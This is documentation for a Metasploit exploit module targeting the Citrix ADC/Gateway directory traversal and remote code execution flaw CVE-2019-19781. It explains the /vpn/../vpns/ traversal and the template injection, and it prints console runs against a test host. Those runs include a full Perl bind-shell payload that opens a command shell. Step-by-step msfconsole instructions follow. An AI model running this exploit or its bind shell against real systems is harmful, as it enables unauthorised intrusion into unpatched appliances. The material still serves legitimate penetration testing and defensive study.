metasploit-gs/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md

Introduction

A directory traversal was discovered in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0.

When the NSPPE receives a request for GET /vpn/index.html, it is supposed to send this request to Apache, which processes it. However, by making the request GET /vpn/../vpns/ (which is not sanitized), Apache transforms the route into GET /vpns/ and processes this last request normally.

This /vpns/ directory is interesting because it contains Perl code. The script newbm.pl creates an array containing information from several parameters, then calls the filewrite function, which writes the content to an XML file on disk.

A malicious attacker can execute arbitrary commands remotely by creating a corrupted XML file that uses the Perl Template Toolkit in part of payload.

msf5 exploit(linux/http/citrix_dir_traversal_rce) > run

[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable
[*] Yeeting cmd/unix/generic payload at 127.0.0.1:8080
[*] Generated payload: id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

[!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target
[!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf5 exploit(linux/http/citrix_dir_traversal_rce) > run

[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable
[*] Yeeting cmd/unix/bind_perl payload at 127.0.0.1:8080
[*] Generated payload: perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
[!] No response to GET KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml request
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (127.0.0.1:51106 -> 127.0.0.1:4444) at 2020-01-13 20:50:45 -0600
[+] Deleted /netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml
[+] Deleted /var/tmp/netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml.ttc2

id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

Verification Steps

1. Install the module as usual
2. Start msfconsole
3. Do: use exploit/linux/http/citrix_dir_traversal_rce
4. Do: set RHOSTS [IP]
5. Do: set LHOST [IP]
6. Do: set VERBOSE true
7. Do: run

Targets

Id  Name
--  ----
0   Python
1   Unix Command

Advanced options

ForceExploit

Override check result.

References

1. https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/
2. https://www.exploit-db.com/exploits/47901
3. https://www.exploit-db.com/exploits/47902